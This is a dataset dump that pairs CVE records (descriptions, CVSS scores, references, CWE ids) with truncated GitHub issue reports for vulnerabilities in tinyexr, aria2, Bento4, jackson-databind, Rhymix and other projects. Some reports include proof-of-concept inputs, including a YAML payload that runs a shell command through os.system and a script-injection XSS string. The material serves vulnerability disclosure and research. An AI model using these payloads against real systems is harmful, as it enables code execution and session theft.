cve_id
stringlengths
13
16
cve_published
stringdate
2019-01-01 16:29:00
2025-02-25 20:15:37
cve_descriptions
stringlengths
34
2.6k
cve_metrics
dict
cve_references
listlengths
1
281
cve_configurations
listlengths
1
70
cve_cwe_list
listlengths
1
1
cve_primary_cwe
stringclasses
164 values
url
stringlengths
36
97
cve_tags
listlengths
1
5
domain
stringclasses
1 value
issue_owner_repo
listlengths
2
2
issue_body
stringlengths
0
198k
issue_title
stringlengths
1
335
issue_comments_url
stringlengths
55
116
issue_comments_count
int64
0
338
issue_created_at
stringdate
2012-06-06 09:34:24
2025-04-02 09:37:20
issue_updated_at
stringdate
2014-04-01 20:16:21
2025-06-16 12:26:58
issue_html_url
stringlengths
36
97
issue_github_id
int64
4.93M
2.97B
issue_number
int64
1
199k
__index_level_0__
int64
0
6.55k
CVE-2018-20652
2019-01-01T16:29:00.403
An attempted excessive memory allocation was discovered in the function tinyexr::AllocateImage in tinyexr.h in tinyexr v0.9.5. Remote attackers could leverage this vulnerability to cause a denial-of-service via crafted input, which leads to an out-of-memory exception.
{ "cvssMetricV2": [ { "acInsufInfo": false, "baseSeverity": "MEDIUM", "cvssData": { "accessComplexity": "MEDIUM", "accessVector": "NETWORK", "authentication": "NONE", "availabilityImpact": "PARTIAL", "baseScore": 4.3, "confidentialityImpact": "NONE...
[ { "source": "cve@mitre.org", "tags": [ "Exploit", "Third Party Advisory" ], "url": "https://github.com/syoyo/tinyexr/issues/104" }, { "source": "af854a3a-2127-422b-91ae-364da2661108", "tags": [ "Exploit", "Third Party Advisory" ], "url": "https://github.co...
[ { "nodes": [ { "cpeMatch": [ { "criteria": "cpe:2.3:a:tinyexr_project:tinyexr:0.9.5:*:*:*:*:*:*:*", "matchCriteriaId": "6839BA33-4B4D-413F-8E81-0C4F9784EBBB", "versionEndExcluding": null, "versionEndIncluding": null, "versionSta...
[ "770" ]
770
https://github.com/syoyo/tinyexr/issues/104
[ "Exploit", "Third Party Advisory" ]
github.com
[ "syoyo", "tinyexr" ]
Hi, there. I test the program at the master branch. ``` commit b3eb24bf635c0ed92f1080a1b269bc8271cbb919 Author: Syoyo Fujita <syoyo@lighttransport.com> Date: Mon Dec 24 20:33:23 2018 +0900 Add IsEXR() API. ``` An Out of Memory problem was discovered in function tinyexr::AllocateImage in tinyexr.h. T...
Program crash due to Out-of-memory in function tinyexr::AllocateImage
https://api.github.com/repos/syoyo/tinyexr/issues/104/comments
3
2018-12-31T13:56:35Z
2018-12-31T15:25:33Z
https://github.com/syoyo/tinyexr/issues/104
394,984,060
104
0
CVE-2019-3500
2019-01-02T07:29:00.197
aria2c in aria2 1.33.1, when --log is used, can store an HTTP Basic Authentication username and password in a file, which might allow local users to obtain sensitive information by reading this file.
{ "cvssMetricV2": [ { "acInsufInfo": false, "baseSeverity": "LOW", "cvssData": { "accessComplexity": "LOW", "accessVector": "LOCAL", "authentication": "NONE", "availabilityImpact": "NONE", "baseScore": 2.1, "confidentialityImpact": "PARTIAL", ...
[ { "source": "cve@mitre.org", "tags": [ "Patch", "Third Party Advisory" ], "url": "https://github.com/aria2/aria2/issues/1329" }, { "source": "cve@mitre.org", "tags": [ "Mailing List", "Third Party Advisory" ], "url": "https://lists.debian.org/debian-lts-an...
[ { "nodes": [ { "cpeMatch": [ { "criteria": "cpe:2.3:a:aria2_project:aria2:1.33.1:*:*:*:*:*:*:*", "matchCriteriaId": "96C8BA0F-F5C0-4768-A381-B61A776211B2", "versionEndExcluding": null, "versionEndIncluding": null, "versionStartE...
[ "532" ]
532
https://github.com/aria2/aria2/issues/1329
[ "Patch", "Third Party Advisory" ]
github.com
[ "aria2", "aria2" ]
Hi Team, I am using aria2 version 1.33.1 on 4.15.0-43-generic 46-Ubuntu. 1. It was observed that URL's which gets downloaded via `--log=` attribute stored sensitive information. 2. In combination with HTTP authentication a username and password can be part of the URL. `aria2c --log=file https://user:passwd@ex...
Metadata and potential password leaks via --log=
https://api.github.com/repos/aria2/aria2/issues/1329/comments
4
2019-01-01T12:52:33Z
2019-01-05T00:33:48Z
https://github.com/aria2/aria2/issues/1329
395,080,684
1,329
1
CVE-2019-3501
2019-01-02T13:29:00.283
The OUGC Awards plugin before 1.8.19 for MyBB allows XSS via a crafted award reason that is mishandled on the awards page or in a user profile.
{ "cvssMetricV2": [ { "acInsufInfo": false, "baseSeverity": "LOW", "cvssData": { "accessComplexity": "MEDIUM", "accessVector": "NETWORK", "authentication": "SINGLE", "availabilityImpact": "NONE", "baseScore": 3.5, "confidentialityImpact": "NONE", ...
[ { "source": "cve@mitre.org", "tags": [ "Exploit", "Issue Tracking", "Third Party Advisory" ], "url": "https://github.com/Sama34/OUGC-Awards/issues/29" }, { "source": "cve@mitre.org", "tags": [ "Third Party Advisory" ], "url": "https://github.com/Sama34/OUG...
[ { "nodes": [ { "cpeMatch": [ { "criteria": "cpe:2.3:a:ougc_awards_project:ougc_awards:*:*:*:*:*:mybb:*:*", "matchCriteriaId": "5B7E7E8E-4508-44F9-861D-A5D9FEE232E7", "versionEndExcluding": "1.8.19", "versionEndIncluding": null, ...
[ "79" ]
79
https://github.com/Sama34/OUGC-Awards/issues/29
[ "Exploit", "Issue Tracking", "Third Party Advisory" ]
github.com
[ "Sama34", "OUGC-Awards" ]
**Describe the bug** Apparently custom reasons are not sanitized on output. **To Reproduce** Steps to reproduce the behavior: 1. Have a mod account level or higher. 2. Go to Manage Awards in ModCP. 3. Give an award to a user and input payload for reason. ```JS <script>alert('XSS')</script> ``` 4. Payload ex...
XSS in reason field.
https://api.github.com/repos/OUGC-Network/ougc-Awards/issues/29/comments
1
2019-01-02T05:47:24Z
2019-01-02T06:23:28Z
https://github.com/OUGC-Network/ougc-Awards/issues/29
395,154,317
29
2
CVE-2019-3573
2019-01-02T15:29:00.360
In libsixel v1.8.2, there is an infinite loop in the function sixel_decode_raw_impl() in the file fromsixel.c, as demonstrated by sixel2png.
{ "cvssMetricV2": [ { "acInsufInfo": false, "baseSeverity": "MEDIUM", "cvssData": { "accessComplexity": "MEDIUM", "accessVector": "NETWORK", "authentication": "NONE", "availabilityImpact": "PARTIAL", "baseScore": 4.3, "confidentialityImpact": "NONE...
[ { "source": "cve@mitre.org", "tags": [ "Exploit", "Third Party Advisory" ], "url": "https://github.com/TeamSeri0us/pocs/tree/master/libsixel" }, { "source": "cve@mitre.org", "tags": [ "Exploit", "Third Party Advisory" ], "url": "https://github.com/saitoha/...
[ { "nodes": [ { "cpeMatch": [ { "criteria": "cpe:2.3:a:libsixel_project:libsixel:1.8.2:*:*:*:*:*:*:*", "matchCriteriaId": "BAFCC979-2F4E-46A5-AC18-B6452E752D90", "versionEndExcluding": null, "versionEndIncluding": null, "versionS...
[ "835" ]
835
https://github.com/saitoha/libsixel/issues/83
[ "Exploit", "Third Party Advisory" ]
github.com
[ "saitoha", "libsixel" ]
./sixel2png [infinite_loop_poc1](https://github.com/TeamSeri0us/pocs/blob/master/libsixel/infinite_loop_poc1) ``` ────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────[ source:../../src/fromsixel.c+561 ]──...
two bugs in img2sixel and sixel2png
https://api.github.com/repos/saitoha/libsixel/issues/83/comments
7
2019-01-02T08:08:21Z
2019-12-14T21:01:47Z
https://github.com/saitoha/libsixel/issues/83
395,173,691
83
4
CVE-2018-20659
2019-01-02T17:29:00.220
An issue was discovered in Bento4 1.5.1-627. The AP4_StcoAtom class in Core/Ap4StcoAtom.cpp has an attempted excessive memory allocation when called from AP4_AtomFactory::CreateAtomFromStream in Core/Ap4AtomFactory.cpp, as demonstrated by mp42hls.
{ "cvssMetricV2": [ { "acInsufInfo": false, "baseSeverity": "MEDIUM", "cvssData": { "accessComplexity": "MEDIUM", "accessVector": "NETWORK", "authentication": "NONE", "availabilityImpact": "PARTIAL", "baseScore": 4.3, "confidentialityImpact": "NONE...
[ { "source": "cve@mitre.org", "tags": [ "Exploit", "Third Party Advisory" ], "url": "https://github.com/axiomatic-systems/Bento4/issues/350" }, { "source": "af854a3a-2127-422b-91ae-364da2661108", "tags": [ "Exploit", "Third Party Advisory" ], "url": "https:...
[ { "nodes": [ { "cpeMatch": [ { "criteria": "cpe:2.3:a:axiosys:bento4:1.5.1-627:*:*:*:*:*:*:*", "matchCriteriaId": "F87642DF-B939-4195-A2AE-F0F1D39CD16D", "versionEndExcluding": null, "versionEndIncluding": null, "versionStartExc...
[ "770" ]
770
https://github.com/axiomatic-systems/Bento4/issues/350
[ "Exploit", "Third Party Advisory" ]
github.com
[ "axiomatic-systems", "Bento4" ]
A crafted input will lead to Memory allocation failed in Ap4StcoAtom.cpp at Bento4 1.5.1-627 Triggered by ./mp42hls crash7.mp4 Poc [crash7.mp4.zip](https://github.com/axiomatic-systems/Bento4/files/2718552/crash7.mp4.zip) Bento4 Version 1.5.1-627 The ASAN information is as follows: ``` ==10432==ERROR: Add...
Allocate for large amounts of memory failed in Ap4StcoAtom.cpp:81 at Bento4 1.5.1-627 when running mp42hls
https://api.github.com/repos/axiomatic-systems/Bento4/issues/350/comments
2
2018-12-31T15:52:26Z
2019-01-12T21:14:48Z
https://github.com/axiomatic-systems/Bento4/issues/350
394,998,583
350
5
CVE-2019-3577
2019-01-02T17:29:00.300
An issue was discovered in Waimai Super Cms 20150505. web/Lib/Action/ProductAction.class.php allows blind SQL Injection via the id[0] parameter to the /product URI.
{ "cvssMetricV2": [ { "acInsufInfo": false, "baseSeverity": "HIGH", "cvssData": { "accessComplexity": "LOW", "accessVector": "NETWORK", "authentication": "NONE", "availabilityImpact": "PARTIAL", "baseScore": 7.5, "confidentialityImpact": "PARTIAL",...
[ { "source": "cve@mitre.org", "tags": [ "Third Party Advisory" ], "url": "https://github.com/caokang/waimai/issues/9" }, { "source": "af854a3a-2127-422b-91ae-364da2661108", "tags": [ "Third Party Advisory" ], "url": "https://github.com/caokang/waimai/issues/9" } ]
[ { "nodes": [ { "cpeMatch": [ { "criteria": "cpe:2.3:a:bijiadao:waimai_super_cms:20150505:*:*:*:*:*:*:*", "matchCriteriaId": "8945479A-0C5E-4FC7-9D88-BC42E8EA0C3C", "versionEndExcluding": null, "versionEndIncluding": null, "versi...
[ "89" ]
89
https://github.com/caokang/waimai/issues/9
[ "Third Party Advisory" ]
github.com
[ "caokang", "waimai" ]
There is a blind sql injection. waimaiCMS is based on thinkphp3.1.3, vulnerable code in web/Lib/Action/ProductAction.class.php ```php public function index(){ $data['fid']=I('id');//店铺分类 $Food=M('Food'); $fooditem=$Food->where($data)->find(); $this->assign('fooditem',$fooditem); $thi...
There is a SQL Injection vulnerability
https://api.github.com/repos/caokang/waimai/issues/9/comments
1
2019-01-02T16:02:56Z
2019-01-03T03:00:52Z
https://github.com/caokang/waimai/issues/9
395,294,746
9
6
CVE-2018-14718
2019-01-02T18:29:00.310
FasterXML jackson-databind 2.x before 2.9.7 might allow remote attackers to execute arbitrary code by leveraging failure to block the slf4j-ext class from polymorphic deserialization.
{ "cvssMetricV2": [ { "acInsufInfo": false, "baseSeverity": "HIGH", "cvssData": { "accessComplexity": "LOW", "accessVector": "NETWORK", "authentication": "NONE", "availabilityImpact": "PARTIAL", "baseScore": 7.5, "confidentialityImpact": "PARTIAL",...
[ { "source": "cve@mitre.org", "tags": [ "Third Party Advisory", "VDB Entry" ], "url": "http://www.securityfocus.com/bid/106601" }, { "source": "cve@mitre.org", "tags": [ "Third Party Advisory" ], "url": "https://access.redhat.com/errata/RHBA-2019:0959" }, { ...
[ { "nodes": [ { "cpeMatch": [ { "criteria": "cpe:2.3:a:fasterxml:jackson-databind:*:*:*:*:*:*:*:*", "matchCriteriaId": "7036DA13-110D-40B3-8494-E361BBF4AFCD", "versionEndExcluding": "2.6.7.3", "versionEndIncluding": null, "versio...
[ "502" ]
502
https://github.com/FasterXML/jackson-databind/issues/2097
[ "Patch", "Third Party Advisory" ]
github.com
[ "FasterXML", "jackson-databind" ]
This issue covers following CVEs related to polymorphic deserialization, gadgets: * CVE-2018-14718: RCE with slf4j-ext jar * CVE-2018-14719: RCE with blaze-ds-opt, -core jars * CVE-2018-14720: exfiltration/XXE with only JDK classes (some JDK versions) * CVE-2018-14721: exfiltration/SSRF with axis2-jaxws Origin...
Block more classes from polymorphic deserialization (CVE-2018-14718 - CVE-2018-14721)
https://api.github.com/repos/FasterXML/jackson-databind/issues/2097/comments
11
2018-07-27T05:58:22Z
2019-10-16T04:34:07Z
https://github.com/FasterXML/jackson-databind/issues/2097
345,100,313
2,097
7
CVE-2018-19360
2019-01-02T18:29:00.717
FasterXML jackson-databind 2.x before 2.9.8 might allow attackers to have unspecified impact by leveraging failure to block the axis2-transport-jms class from polymorphic deserialization.
{ "cvssMetricV2": [ { "acInsufInfo": false, "baseSeverity": "HIGH", "cvssData": { "accessComplexity": "LOW", "accessVector": "NETWORK", "authentication": "NONE", "availabilityImpact": "PARTIAL", "baseScore": 7.5, "confidentialityImpact": "PARTIAL",...
[ { "source": "cve@mitre.org", "tags": [ "Third Party Advisory", "VDB Entry" ], "url": "http://www.securityfocus.com/bid/107985" }, { "source": "cve@mitre.org", "tags": [ "Third Party Advisory" ], "url": "https://access.redhat.com/errata/RHBA-2019:0959" }, { ...
[ { "nodes": [ { "cpeMatch": [ { "criteria": "cpe:2.3:a:fasterxml:jackson-databind:*:*:*:*:*:*:*:*", "matchCriteriaId": "5128ECDA-6F9A-42AC-9063-CDFC4C256537", "versionEndExcluding": null, "versionEndIncluding": "2.6.7.2", "versio...
[ "502" ]
502
https://github.com/FasterXML/jackson-databind/issues/2186
[ "Issue Tracking", "Patch", "Third Party Advisory" ]
github.com
[ "FasterXML", "jackson-databind" ]
This issue covers following CVEs related to polymorphic deserialization, gadgets: CVE-2018-19360 (axis2-transport-jms) CVE-2018-19361 (openjpa) CVE-2018-19362 (jboss-common-core) See https://medium.com/@cowtowncoder/on-jackson-cves-dont-panic-here-is-what-you-need-to-know-54cd0d6e8062 for description of the gen...
Block more classes from polymorphic deserialization (CVE-2018-19360, CVE-2018-19361, CVE-2018-19362)
https://api.github.com/repos/FasterXML/jackson-databind/issues/2186/comments
8
2018-11-18T23:39:02Z
2020-07-31T17:29:54Z
https://github.com/FasterXML/jackson-databind/issues/2186
382,014,049
2,186
8
CVE-2019-3580
2019-01-03T01:29:00.490
OpenRefine through 3.1 allows arbitrary file write because Directory Traversal can occur during the import of a crafted project file.
{ "cvssMetricV2": [ { "acInsufInfo": false, "baseSeverity": "MEDIUM", "cvssData": { "accessComplexity": "LOW", "accessVector": "NETWORK", "authentication": "NONE", "availabilityImpact": "NONE", "baseScore": 5, "confidentialityImpact": "NONE", ...
[ { "source": "cve@mitre.org", "tags": [ "Exploit", "Issue Tracking", "Third Party Advisory" ], "url": "https://github.com/OpenRefine/OpenRefine/issues/1927" }, { "source": "af854a3a-2127-422b-91ae-364da2661108", "tags": [ "Exploit", "Issue Tracking", "T...
[ { "nodes": [ { "cpeMatch": [ { "criteria": "cpe:2.3:a:openrefine:openrefine:*:*:*:*:*:*:*:*", "matchCriteriaId": "A371C8E5-A486-40DE-8750-DAFA4D592354", "versionEndExcluding": null, "versionEndIncluding": "3.1", "versionStartExc...
[ "22" ]
22
https://github.com/OpenRefine/OpenRefine/issues/1927
[ "Exploit", "Issue Tracking", "Third Party Advisory" ]
github.com
[ "OpenRefine", "OpenRefine" ]
**Describe the bug** The import of a project is prone to a path traversal and thus an arbitrary file write. **To Reproduce** Steps to reproduce the behavior: 1. Download [payload.txt](https://github.com/OpenRefine/OpenRefine/files/2721399/payload.txt) 2. `gzip payload.txt`, `payload.txt.gz` is greated 3. Go to ...
Project import vulnerable to arbitrary file write
https://api.github.com/repos/OpenRefine/OpenRefine/issues/1927/comments
3
2019-01-02T17:44:47Z
2019-02-22T19:13:17Z
https://github.com/OpenRefine/OpenRefine/issues/1927
395,324,645
1,927
9
CVE-2018-20663
2019-01-03T19:29:01.633
The Reporting Addon (aka Reports Addon) through 2019-01-02 for CUBA Platform through 6.10.x has Persistent XSS via the "Reports > Reports" name field.
{ "cvssMetricV2": [ { "acInsufInfo": false, "baseSeverity": "LOW", "cvssData": { "accessComplexity": "MEDIUM", "accessVector": "NETWORK", "authentication": "SINGLE", "availabilityImpact": "NONE", "baseScore": 3.5, "confidentialityImpact": "NONE", ...
[ { "source": "cve@mitre.org", "tags": [ "Exploit", "Third Party Advisory" ], "url": "https://github.com/cuba-platform/reports/issues/140" }, { "source": "af854a3a-2127-422b-91ae-364da2661108", "tags": [ "Exploit", "Third Party Advisory" ], "url": "https://g...
[ { "nodes": [ { "cpeMatch": [ { "criteria": "cpe:2.3:a:haulmont:cuba_platform:*:*:*:*:*:*:*:*", "matchCriteriaId": "7F6B5878-0971-4E5A-A121-439A3E3F0DEA", "versionEndExcluding": null, "versionEndIncluding": "6.10.7", "versionStar...
[ "79" ]
79
https://github.com/cuba-platform/reports/issues/140
[ "Exploit", "Third Party Advisory" ]
github.com
[ "cuba-platform", "reports" ]
<!-- Please use https://www.cuba-platform.com/discuss for discussion, support, and reporting problems about CUBA Studio. This repository is only for issues of the Reporting addon. When creating an issue, provide as much as possible of the following information: --> ### Environment - Platform version: 6.9....
Permanent XSS attack through Report's Name field
https://api.github.com/repos/cuba-platform/reports/issues/140/comments
5
2018-12-21T13:58:43Z
2019-03-04T13:25:39Z
https://github.com/cuba-platform/reports/issues/140
393,468,080
140
10
CVE-2019-3575
2019-01-03T19:29:01.727
Sqla_yaml_fixtures 0.9.1 allows local users to execute arbitrary python code via the fixture_text argument in sqla_yaml_fixtures.load.
{ "cvssMetricV2": [ { "acInsufInfo": false, "baseSeverity": "MEDIUM", "cvssData": { "accessComplexity": "LOW", "accessVector": "LOCAL", "authentication": "NONE", "availabilityImpact": "PARTIAL", "baseScore": 4.6, "confidentialityImpact": "PARTIAL",...
[ { "source": "cve@mitre.org", "tags": [ "Exploit", "Issue Tracking", "Third Party Advisory" ], "url": "https://github.com/schettino72/sqla_yaml_fixtures/issues/20" }, { "source": "af854a3a-2127-422b-91ae-364da2661108", "tags": [ "Exploit", "Issue Tracking", ...
[ { "nodes": [ { "cpeMatch": [ { "criteria": "cpe:2.3:a:sqla_yaml_fixtures_project:sqla_yaml_fixtures:0.9.1:*:*:*:*:*:*:*", "matchCriteriaId": "7ED3C927-3CA7-415E-9574-6D108DC91EA7", "versionEndExcluding": null, "versionEndIncluding": null, ...
[ "94" ]
94
https://github.com/schettino72/sqla_yaml_fixtures/issues/20
[ "Exploit", "Issue Tracking", "Third Party Advisory" ]
github.com
[ "schettino72", "sqla_yaml_fixtures" ]
import sqla_yaml_fixtures test_str ='!!python/object/apply:os.system ["dir"]' sqla_yaml_fixtures.load('a','a',test_str) Hi, there is a vulnerability in load methods in sqla_yaml_fixtures,please see PoC above. It can execute arbitrary python commands resulting in command execution.
sqla_yaml_fixtures.load method is vulnerable
https://api.github.com/repos/schettino72/sqla_yaml_fixtures/issues/20/comments
2
2019-01-02T15:02:16Z
2019-01-04T20:53:01Z
https://github.com/schettino72/sqla_yaml_fixtures/issues/20
395,274,955
20
11
CVE-2018-19600
2019-01-03T20:29:00.437
Rhymix CMS 1.9.8.1 allows XSS via an index.php?module=admin&act=dispModuleAdminFileBox SVG upload.
{ "cvssMetricV2": [ { "acInsufInfo": false, "baseSeverity": "LOW", "cvssData": { "accessComplexity": "MEDIUM", "accessVector": "NETWORK", "authentication": "SINGLE", "availabilityImpact": "NONE", "baseScore": 3.5, "confidentialityImpact": "NONE", ...
[ { "source": "cve@mitre.org", "tags": [ "Exploit", "Issue Tracking", "Patch", "Third Party Advisory" ], "url": "https://github.com/rhymix/rhymix/issues/1088" }, { "source": "cve@mitre.org", "tags": [ "Exploit", "Third Party Advisory" ], "url": "...
[ { "nodes": [ { "cpeMatch": [ { "criteria": "cpe:2.3:a:rhymix:rhymix:1.9.8.1:*:*:*:*:*:*:*", "matchCriteriaId": "D2833B50-FE4E-40C7-AB0B-3572D5C8A103", "versionEndExcluding": null, "versionEndIncluding": null, "versionStartExclud...
[ "79" ]
79
https://github.com/rhymix/rhymix/issues/1088
[ "Exploit", "Issue Tracking", "Patch", "Third Party Advisory" ]
github.com
[ "rhymix", "rhymix" ]
Affected software: Rhymix CMS 1.9.8.1 Type of vulnerability: XSS via SVG file upload. Description: Rhymix CMS is prone to a Persistent Cross-Site Scripting attack that allows a malicious user to inject HTML or scripts that can access any cookies, session tokens, or other sensitive information retained by your bro...
XSS via SVG file upload in Rhymix CMS 1.9.8.1
https://api.github.com/repos/rhymix/rhymix/issues/1088/comments
7
2018-09-16T08:51:31Z
2019-01-11T07:12:45Z
https://github.com/rhymix/rhymix/issues/1088
360,618,894
1,088
12
CVE-2018-19601
2019-01-03T20:29:00.500
Rhymix CMS 1.9.8.1 allows SSRF via an index.php?module=admin&act=dispModuleAdminFileBox SVG upload.
{ "cvssMetricV2": [ { "acInsufInfo": false, "baseSeverity": "MEDIUM", "cvssData": { "accessComplexity": "LOW", "accessVector": "NETWORK", "authentication": "SINGLE", "availabilityImpact": "PARTIAL", "baseScore": 6.5, "confidentialityImpact": "PARTI...
[ { "source": "cve@mitre.org", "tags": [ "Exploit", "Issue Tracking", "Patch", "Third Party Advisory" ], "url": "https://github.com/rhymix/rhymix/issues/1089" }, { "source": "cve@mitre.org", "tags": [ "Exploit", "Third Party Advisory" ], "url": "...
[ { "nodes": [ { "cpeMatch": [ { "criteria": "cpe:2.3:a:rhymix:rhymix:1.9.8.1:*:*:*:*:*:*:*", "matchCriteriaId": "D2833B50-FE4E-40C7-AB0B-3572D5C8A103", "versionEndExcluding": null, "versionEndIncluding": null, "versionStartExclud...
[ "918" ]
918
https://github.com/rhymix/rhymix/issues/1089
[ "Exploit", "Issue Tracking", "Patch", "Third Party Advisory" ]
github.com
[ "rhymix", "rhymix" ]
Affected software: Rhymix CMS 1.9.8.1 Type of vulnerability: SSRF via SVG file upload. Description: Discovered by: BreachLock Website: https://www.breachlock.com Author: Subodh Kumar Description: SSRF as in Server Side Request Forgery is a vulnerability that allows an attacker to force server interfa...
SSRF via SVG file upload in Rhymix CMS 1.9.8.1
https://api.github.com/repos/rhymix/rhymix/issues/1089/comments
3
2018-09-16T08:56:44Z
2019-01-11T07:13:30Z
https://github.com/rhymix/rhymix/issues/1089
360,619,275
1,089
13
CVE-2019-5310
2019-01-04T14:29:00.457
YUNUCMS 1.1.8 has XSS in app/admin/controller/System.php because crafted data can be written to the sys.php file, as demonstrated by site_title in an admin/system/basic POST request.
{ "cvssMetricV2": [ { "acInsufInfo": false, "baseSeverity": "MEDIUM", "cvssData": { "accessComplexity": "MEDIUM", "accessVector": "NETWORK", "authentication": "NONE", "availabilityImpact": "NONE", "baseScore": 4.3, "confidentialityImpact": "NONE", ...
[ { "source": "cve@mitre.org", "tags": [ "Exploit", "Third Party Advisory" ], "url": "https://github.com/doublefast/yunucms/issues/6" }, { "source": "af854a3a-2127-422b-91ae-364da2661108", "tags": [ "Exploit", "Third Party Advisory" ], "url": "https://github...
[ { "nodes": [ { "cpeMatch": [ { "criteria": "cpe:2.3:a:yunucms:yunucms:1.1.8:*:*:*:*:*:*:*", "matchCriteriaId": "3219173C-4A6B-496B-A8BA-D0879257DF03", "versionEndExcluding": null, "versionEndIncluding": null, "versionStartExclud...
[ "79" ]
79
https://github.com/doublefast/yunucms/issues/6
[ "Exploit", "Third Party Advisory" ]
github.com
[ "doublefast", "yunucms" ]
There is an Stored Cross Site Scripting vulnerability in your latest version of the CMS v1.1.8 Download link: "http://img.yunucms.com/o_1cvnmdq4igqv3i713iq183fu7qa.zip?attname=" In the /YUNUCMSv1.1.8/app/admin/controller/System.php The judgment code of the basic settings page is: ![image](https://user-images.git...
Bug: V1.1.8 Stored Cross Site Scripting Vulnerability
https://api.github.com/repos/doublefast/yunucms/issues/6/comments
0
2019-01-04T06:48:58Z
2019-01-04T06:48:58Z
https://github.com/doublefast/yunucms/issues/6
395,824,686
6
14
CVE-2019-5311
2019-01-04T15:29:00.563
An issue was discovered in YUNUCMS V1.1.8. app/index/controller/Show.php has an XSS vulnerability via the index.php/index/show/index cw parameter.
{ "cvssMetricV2": [ { "acInsufInfo": false, "baseSeverity": "MEDIUM", "cvssData": { "accessComplexity": "MEDIUM", "accessVector": "NETWORK", "authentication": "NONE", "availabilityImpact": "NONE", "baseScore": 4.3, "confidentialityImpact": "NONE", ...
[ { "source": "cve@mitre.org", "tags": [ "Exploit", "Third Party Advisory" ], "url": "https://github.com/doublefast/yunucms/issues/5" }, { "source": "af854a3a-2127-422b-91ae-364da2661108", "tags": [ "Exploit", "Third Party Advisory" ], "url": "https://github...
[ { "nodes": [ { "cpeMatch": [ { "criteria": "cpe:2.3:a:yunucms:yunucms:1.1.8:*:*:*:*:*:*:*", "matchCriteriaId": "3219173C-4A6B-496B-A8BA-D0879257DF03", "versionEndExcluding": null, "versionEndIncluding": null, "versionStartExclud...
[ "79" ]
79
https://github.com/doublefast/yunucms/issues/5
[ "Exploit", "Third Party Advisory" ]
github.com
[ "doublefast", "yunucms" ]
There is an xss vulnerability in your latest version of the CMS v1.1.8 Download link: "http://img.yunucms.com/o_1cvnmdq4igqv3i713iq183fu7qa.zip?attname=" 1. In the YUNUCMSv1.1.8/app/index/controller/Show.php , No filtering to cw in the index( ) function: ![image](https://user-images.githubusercontent.com/15666994...
Bug: V1.1.8 Cross Site Scripting Vulnerability
https://api.github.com/repos/doublefast/yunucms/issues/5/comments
0
2019-01-04T03:42:16Z
2019-01-04T03:42:16Z
https://github.com/doublefast/yunucms/issues/5
395,800,185
5
15
CVE-2019-5312
2019-01-04T16:29:00.307
An issue was discovered in weixin-java-tools v3.3.0. There is an XXE vulnerability in the getXmlDoc method of the BaseWxPayResult.java file. NOTE: this issue exists because of an incomplete fix for CVE-2018-20318.
{ "cvssMetricV2": [ { "acInsufInfo": false, "baseSeverity": "HIGH", "cvssData": { "accessComplexity": "LOW", "accessVector": "NETWORK", "authentication": "NONE", "availabilityImpact": "PARTIAL", "baseScore": 7.5, "confidentialityImpact": "PARTIAL",...
[ { "source": "cve@mitre.org", "tags": [ "Exploit", "Patch", "Third Party Advisory" ], "url": "https://github.com/Wechat-Group/WxJava/issues/903" }, { "source": "af854a3a-2127-422b-91ae-364da2661108", "tags": [ "Exploit", "Patch", "Third Party Advisory" ...
[ { "nodes": [ { "cpeMatch": [ { "criteria": "cpe:2.3:a:wxjava_project:wxjava:3.3.0:*:*:*:*:*:*:*", "matchCriteriaId": "63AA5095-3A9E-42DC-9A13-2E6F14BA0B09", "versionEndExcluding": null, "versionEndIncluding": null, "versionStart...
[ "611" ]
611
https://github.com/Wechat-Group/WxJava/issues/903
[ "Exploit", "Patch", "Third Party Advisory" ]
github.com
[ "Wechat-Group", "WxJava" ]
Hello, i have tested the fix for the XXE vulnerability of the issue [889](https://github.com/Wechat-Group/WxJava/issues/889). Unfortunately, the vulnerability is still present in version `3.3.0`, see the image below. ![image](https://user-images.githubusercontent.com/5180740/50690962-9a50ba80-102f-11e9-8fea-9...
XXE Vulnerability
https://api.github.com/repos/binarywang/WxJava/issues/903/comments
2
2019-01-04T14:04:31Z
2019-01-12T13:21:37Z
https://github.com/binarywang/WxJava/issues/903
395,936,486
903
16
CVE-2019-5720
2019-01-08T10:29:00.193
includes/db/class.reflines_db.inc in FrontAccounting 2.4.6 contains a SQL Injection vulnerability in the reference field that can allow the attacker to grab the entire database of the application via the void_transaction.php filterType parameter.
{ "cvssMetricV2": [ { "acInsufInfo": false, "baseSeverity": "HIGH", "cvssData": { "accessComplexity": "LOW", "accessVector": "NETWORK", "authentication": "NONE", "availabilityImpact": "PARTIAL", "baseScore": 7.5, "confidentialityImpact": "PARTIAL",...
[ { "source": "cve@mitre.org", "tags": [ "Exploit", "Third Party Advisory" ], "url": "https://github.com/FrontAccountingERP/FA/issues/38" }, { "source": "af854a3a-2127-422b-91ae-364da2661108", "tags": [ "Exploit", "Third Party Advisory" ], "url": "https://gi...
[ { "nodes": [ { "cpeMatch": [ { "criteria": "cpe:2.3:a:frontaccounting:frontaccounting:2.4.6:*:*:*:*:*:*:*", "matchCriteriaId": "8E2A02E8-987B-46A5-A775-30F0B6DE55E7", "versionEndExcluding": null, "versionEndIncluding": null, "ve...
[ "89" ]
89
https://github.com/FrontAccountingERP/FA/issues/38
[ "Exploit", "Third Party Advisory" ]
github.com
[ "FrontAccountingERP", "FA" ]
> Sorry,This is my first time to chat with people in English. Frontaccounting is using function db_escape() to escape value. But some variables do not use the function db_escape(). **environment** : docker mattrayner/lamp:latest-1604 ### 0x00 Description includes/db/class.reflines_db.inc:156 If I set parameter ...
SQL Injection
https://api.github.com/repos/FrontAccountingERP/FA/issues/38/comments
2
2019-01-07T11:10:06Z
2020-07-13T11:48:08Z
https://github.com/FrontAccountingERP/FA/issues/38
396,445,072
38
17
CVE-2016-10735
2019-01-09T05:29:00.883
In Bootstrap 3.x before 3.4.0 and 4.x-beta before 4.0.0-beta.2, XSS is possible in the data-target attribute, a different vulnerability than CVE-2018-14041.
{ "cvssMetricV2": [ { "acInsufInfo": false, "baseSeverity": "MEDIUM", "cvssData": { "accessComplexity": "MEDIUM", "accessVector": "NETWORK", "authentication": "NONE", "availabilityImpact": "NONE", "baseScore": 4.3, "confidentialityImpact": "NONE", ...
[ { "source": "cve@mitre.org", "tags": null, "url": "https://access.redhat.com/errata/RHBA-2019:1076" }, { "source": "cve@mitre.org", "tags": null, "url": "https://access.redhat.com/errata/RHBA-2019:1570" }, { "source": "cve@mitre.org", "tags": null, "url": "https://access....
